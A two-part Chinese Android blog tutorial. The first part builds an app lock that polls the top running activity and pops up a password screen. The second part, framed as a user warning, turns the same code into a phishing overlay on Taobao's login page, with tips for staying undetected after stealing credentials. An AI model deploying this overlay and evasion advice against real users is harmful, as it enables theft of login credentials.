导读:本文介绍如何实现对应用加锁的功能,无须root权限
某些人有时候会有这样一种需求,小A下载了个软件,只是软件中的美女过于诱惑与暴露,所以他不想让别人知道这是个什么软件,起码不想让别人打开浏览。而这款软件又没有锁,任何人都可以打开,肿么办呢?如果打开它的时候需要输入密码,那该多好阿!于是,程序锁这种应用就产生了
程序锁不是最近才有的,很久之前android就有这种apk了
这一期我们来苛刻如何实现程序加锁功能
首先,我们先明确一下我们要做的程序具有什么功能
1可以选择需要加锁的程序
2可以设置密码
3可以关闭程序锁
这里作为演示,我们就尽量简化代码
我们先说最关键的部分
最关键的地方在于:当用户打开一个应用的时候,怎么弹出密码页面?
这里没有什么太好的办法,需要扫描task中的topActivity
首先,我们先获得运行的task
- mActivityManager
= (ActivityManager) context.getSystemService("activity"); - //mActivityManager.getRunningTasks(1);//List
getRunningTasks方法返回一个List,我们来看看这个List是什么
- Return
a list of the tasks that are currently running, with the most recent being first and older ones after in order. - ……
- ComponentName
topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
- ComponentName
topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity; - String
packageName = topActivity.getPackageName(); - String
className = topActivity.getClassName(); - Log.v(TAG,
"packageName" + packageName); - Log.v(TAG,
"className" + className); -
- if
(testPackageName.equals(packageName) -
&& testClassName.equals(className)) { -
Intent intent = new Intent(); -
intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity"); -
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); -
mContext.startActivity(intent); - }
- String
testPackageName = "com.htc.notes"; - String
testClassName = "com.htc.notes.collection.NotesGridViewActivity";
下面我们该想,这段代码何时执行了
打开一个应用程序,系统不会发送广播,我们无法直接监听,所以这里我们采取定时扫描的策略
这里只是一个简单的实现,之后我们再讨论优化
我们采取每秒中检查一次task的方式,这里使用Timer吧,用Handler也一样可以实现
- private
Timer mTimer; - private
void startTimer() { -
if (mTimer == null) { -
mTimer = new Timer(); -
LockTask lockTask = new LockTask(this); -
mTimer.schedule(lockTask, 0L, 1000L); -
} - }
到这里,其实我们的关键代码就已经完成了
下面贴出完整带代码,注意:我们只关注弹出锁界面这部分,其他部分自行实现(比如文章末尾提到的)
Task,负责检查task,并在适当的时候弹出密码页面
- public
class LockTask extends TimerTask { -
public static final String TAG = "LockTask"; -
private Context mContext; -
String testPackageName = "com.htc.notes"; -
String testClassName = "com.htc.notes.collection.NotesGridViewActivity"; -
-
private ActivityManager mActivityManager; -
-
public LockTask(Context context) { -
mContext = context; -
mActivityManager = (ActivityManager) context.getSystemService("activity"); -
} -
-
@Override -
public void run() { -
ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity; -
String packageName = topActivity.getPackageName(); -
String className = topActivity.getClassName(); -
Log.v(TAG, "packageName" + packageName); -
Log.v(TAG, "className" + className); -
-
if (testPackageName.equals(packageName) -
&& testClassName.equals(className)) { -
Intent intent = new Intent(); -
intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity"); -
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); -
mContext.startActivity(intent); -
} -
} - }
- public
class LockService extends Service { -
private Timer mTimer; -
public static final int FOREGROUND_ID = 0; -
-
private void startTimer() { -
if (mTimer == null) { -
mTimer = new Timer(); -
LockTask lockTask = new LockTask(this); -
mTimer.schedule(lockTask, 0L, 1000L); -
} -
} -
-
public IBinder onBind(Intent intent) { -
return null; -
} -
-
public void onCreate() { -
super.onCreate(); -
startForeground(FOREGROUND_ID, new Notification()); -
} -
-
public int onStartCommand(Intent intent, int flags, int startId) { -
startTimer(); -
return super.onStartCommand(intent, flags, startId); -
} -
-
public void onDestroy() { -
stopForeground(true); -
mTimer.cancel(); -
mTimer.purge(); -
mTimer = null; -
super.onDestroy(); -
} - }
- public
class MainActivity extends Activity { -
-
public void onCreate(Bundle savedInstanceState){ -
super.onCreate(savedInstanceState); -
startService(new Intent(this, LockService.class)); -
} - }
PasswordActivity,密码页面,很粗糙,没有核对密码逻辑,自行实现
记得重写onBackPressed函数,不然按返回键的时候……你懂的
- public
class PasswordActivity extends Activity { -
-
private static final String TAG = "PasswordActivity"; -
Button okButton; -
EditText passwordEditText; -
private boolean mFinish = false; -
-
@Override -
protected void onCreate(Bundle savedInstanceState) { -
super.onCreate(savedInstanceState); -
setContentView(R.layout.password); -
passwordEditText = (EditText) findViewById(R.id.password); -
okButton = (Button) findViewById(R.id.ok); -
okButton.setOnClickListener(new View.OnClickListener() { -
public void onClick(View v) { -
String password = passwordEditText.getText().toString(); -
Log.v(TAG, "password" + password); -
mFinish = true; -
finish(); -
} -
}); -
} -
-
public void onBackPressed(){} -
-
public void onPause(){ -
super.onPause(); -
if(!mFinish){ -
finish(); -
} -
} - }
- <</span>uses-permission
android:name="android.permission.GET_TASKS"/>
关于程序的其他部分,这里只做简要说明
选择应用对其进行加锁部分
1列出系统中所有程序(你也可以自由发挥,比如过滤掉原始应用)
2选择,然后存入数据库(当然,最好也有取消功能,记得从数据库中删除数据)
程序锁总开关
可以使用sharedPreference,设置一个boolean开关
现在,当我想要打开htc的note应用的时候,就会弹出密码页面当我解锁,按home会回到桌面,长按home,点击note,还是会弹出密码框
因为是每秒检查一次,所以可能会有一点点延迟,你可以设置为500毫秒,但是越频繁,占用资源就越多
上面的代码我取得topActivity后检查了其包名行和类名,所以只有当打开指定的页面的时候,才会弹出密码锁
比如我对Gallery应用加密了,但是用户正在编辑短信,这时候它想发彩信,于是他通过短信进入到了Gallery……
对于某些用户的某些需求来说,这是不能容忍的,这时,我们只需简单修改下判断逻辑即可:只检查包名,包名一致就弹出密码锁,这样就完美了
程序锁我就分析到这里
最后一句
当使用程序锁的时候,你长按home,发现程序锁也出现在“最近的任务”中,肿么办……给此activity设置android:excludeFromRecents="true"即可
导读:文本介绍一种钓鱼应用,讲述如何骗取用户的用户名和密码,无须root
这个话题是继续android安全问题(二) 程序锁延伸的
之前我已经展示了如何制作程序锁。当打开指定应用的时候,弹出一个密码页面。
程序锁的话题虽然是和安全相关,但是这应该属于防范的范围,如果被人恶意利用,那么后果……
这期我来揭示一下一种钓鱼程序的原理,希望广大用户不要上当受骗,最主要的是:希望大家意识到安全问
之前我用定时扫描activity的方法来检查打开的页面是不是我们所需要的页面
- ComponentName
topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity;
从log中我们能得到其包和类的信息
- 10-17
10:02:14.698: I/ActivityManager(246): Displayed com.taobao.taobao/com.taobao.tao.LoginActivity: +305ms
恩,这就好办了,下面我只需改三处,程序锁这个应用就会变成调用应用
第一个修改很简单,修改我们监听的包名和类名即可
- String
testPackageName = "com.taobao.taobao"; - String
testClassName = "com.taobao.tao.LoginActivity";
- public
class LockTask extends TimerTask { -
public static final String TAG = "LockTask"; -
private Context mContext; -
String testPackageName = "com.taobao.taobao"; -
String testClassName = "com.taobao.tao.LoginActivity"; -
-
private ActivityManager mActivityManager; -
-
public LockTask(Context context) { -
mContext = context; -
mActivityManager = (ActivityManager) context.getSystemService("activity"); -
} -
-
@Override -
public void run() { -
ComponentName topActivity = mActivityManager.getRunningTasks(1).get(0).topActivity; -
String packageName = topActivity.getPackageName(); -
String className = topActivity.getClassName(); -
Log.v(TAG, "packageName" + packageName); -
Log.v(TAG, "className" + className); -
-
if (testPackageName.equals(packageName) -
&& testClassName.equals(className)) { -
Intent intent = new Intent(); -
intent.setClassName("com.example.locktest", "com.example.locktest.PasswordActivity"); -
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); -
mContext.startActivity(intent); -
} -
} - }
第二个修改有些技术含量,可能会需要一个专业的美工,来仿造一个淘宝的登录页面,就如上图所示的那样
最后一个修改,当病毒获取了用户名和密码之后,就不要再继续监听了,不然次数多了肯定会被发现
为了尽量不让用户察觉,可以把频率调高一些,比如500ms检查一次,这样用户就很难察觉了
测试项目完整源码见这里,代码是以android4.0为基础写的(当然,我的钓鱼页面是简陋的,只是用于演示)
(由于csdn只允许传图片,还得劳烦大家去我iteye的blog下载。。。汗阿)
无论是程序锁还是钓鱼程序,他们可能都担心耗电问题,因为耗电过多也会引起用户的注意
我们可以降低检查频率(当然,钓鱼程序是不会这么干的)
我们可以监控屏幕状态,当屏幕关闭的时候,我们可以停止监听,这时候也没有必要监听,当点亮的时候我们再监听
如何监听屏幕状态?
- <</span>receiver
android:name=".ScreenListenerReceiver"> -
<</span>intent-filter> -
<</span>action android:name="android.intent.action.SCREEN_OFF"/> -
<</span>action android:name="android.intent.action.SCREEN_ON"/> -
</</span>intent-filter> - </</span>receiver>